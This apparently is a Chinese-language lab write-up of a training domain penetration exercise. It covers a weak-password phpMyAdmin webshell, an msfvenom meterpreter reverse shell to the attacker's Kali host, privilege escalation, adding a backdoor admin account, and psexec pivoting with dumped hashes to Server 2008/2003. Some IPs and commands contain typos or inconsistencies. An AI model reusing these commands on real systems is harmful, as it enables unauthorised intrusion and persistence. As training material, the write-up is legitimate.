0%

域渗透

一次实训域渗透经历

win7

win7是跳板机

先在kali查看ip和网段

kali的ip是192.168.102.128

![图片 1](实训域渗透/图片 1.png)

nmap -sS 192.168.102.0/24

扫出来的ip之后去试一下,看看哪个是打开的win7虚拟机,主机发现是192.168.102.136

这里我自己的win10好像在浏览器里访问不了102这个网段,导致我去访问192.168.102.136一直都是无响应。然后在kali里试了一下去访问,成功了。

![图片 2](实训域渗透/图片 2.png)

用御剑扫描扫一下web目录

![图片 3](实训域渗透/图片 3.png)

上来就有一个phpmyadmin

然后在浏览器里登录,输进去192.168.102.136/phpmyadmin/index.php

弱口令root/root,成功进入

图片 4

phpmyadmin后台getshell

大致流程就是

Mysql5.0以后会有日志生成的文件,在phpmyadmin里把日志生成的文件 指向到一个

webshell,然后写一句话木马。截图如下

![图片 5](实训域渗透/图片 5.png)

![图片 6](实训域渗透/图片 6.png)

![图片 7](实训域渗透/图片 7.png)

这里是写入一句话木马

![图片 8](实训域渗透/图片 8.png)

然后我发现蚁剑连接提示 返回数据为空

然后我去浏览器里看一下这个shell,发现木马没被写进入,然后重头再来,写路径什么的。最后发现报一个这样的错误

![图片 9](实训域渗透/图片 9.png)

重装win7虚拟机

重装好了,是我脑残了,上次作业设置的密码我忘改了。。。应该要改成cmd

因为重装了,所以win7的ip是192.168.102.129,过程和上面是一样的,再来一遍就行了。。就不重复截图了

![图片 10](实训域渗透/图片 10.png)

多说一句,这里有两个站点,还有一个yxcms。也可以传shell,具体就是ip/index.php?r=admin,用户名密码是admin/123456,然后找一个php文件把木马写进去,直接连即可。

连上之后,就和上次的msf作业一样,用

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.102.128 LPORT=4444 -f exe -o test.exe

生成一个木马,然后用蚁剑传进去,然后运行

1
2
3
4
5
6
7
use exploit/multi/handler 

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.102.128

set LPORT 4444

![图片 11](实训域渗透/图片 11.png)

![图片 12](实训域渗透/图片 12.png)

![图片 13](实训域渗透/图片 13.png)

![图片 14png](实训域渗透/图片 14png.png)

成功交互之后,正常,运行一些指令看看信息

![图片 15](实训域渗透/图片 15.png)

![图片 16](实训域渗透/图片 16.png)

Ip正确

尝试getsystem

直接提权成功

![图片 17](实训域渗透/图片 17.png)

运行shell,进入win7的终端,查看一下用户组![图片 18](/Users/adam/Desktop/blog/source/_posts/实训域渗透/图片 18.png)

创建用户,并且将用户添加至管理员

1
net user name ***** /add

密码需要大小写字母+数字+符号

然后

1
net loacalgroup administrators name /add

添加至管理员用户组

打开远程桌面,登录

msf

1
run post/windows/manage/enable_rdp
1
rdesktop 192.168.102.129

成功打开远程桌面,

![图片 19](实训域渗透/图片 19.png)

去admin目录的桌面下,查看flag文件![图片 20](实训域渗透/图片 20.png)

sever2008

打完win7之后ipconfig

可以看到一个192.168.52.138的ip

这就是win7的内网ip![图片 21](实训域渗透/图片 21.png)

然后设置路由

![图片 22](实训域渗透/图片 22.png)

然后用arp的命令去扫内网的ip

可以看到一个192.168.52.138的ip。

这是windows server2008的ip

![图片 23](实训域渗透/图片 23.png)

接下来就用psexec去打就行了

LHOST是win7的ip

RHOST是server2008的ip

![图片 24](实训域渗透/图片 24.png)

连win7把管理员的账户哈希给dump出来,然后set

图不放了,怕被人拿去爆,因为我设置的是我常用密码

再设置一个域,SMBDomain

看一下配置,没问题

1
show options

交互一下

超时

再交互

超时

重复n次

无解

。。。![图片 27](实训域渗透/图片 27.png)

开正向代理可以进去

set payload,reverse改成bind

创建用户啥的,都和第一台一样。![图片 28](实训域渗透/图片 28.png)

![图片 29](实训域渗透/图片 29.png)

开远程桌面

好慢。。。。

![图片 32](实训域渗透/图片 32.png)

![图片 30](实训域渗透/图片 30.png)

域控拿下之后,找剩下的域主机

sever 2003

然后和之前那个set一样

把RHOST改成那个域主机2003的ip

192.186.52.141

正向代理,然后开3389端口

然后还是去挂代理连远程桌面,和上面一样

两个机子一样操作

![图片 l](实训域渗透/图片 l.png)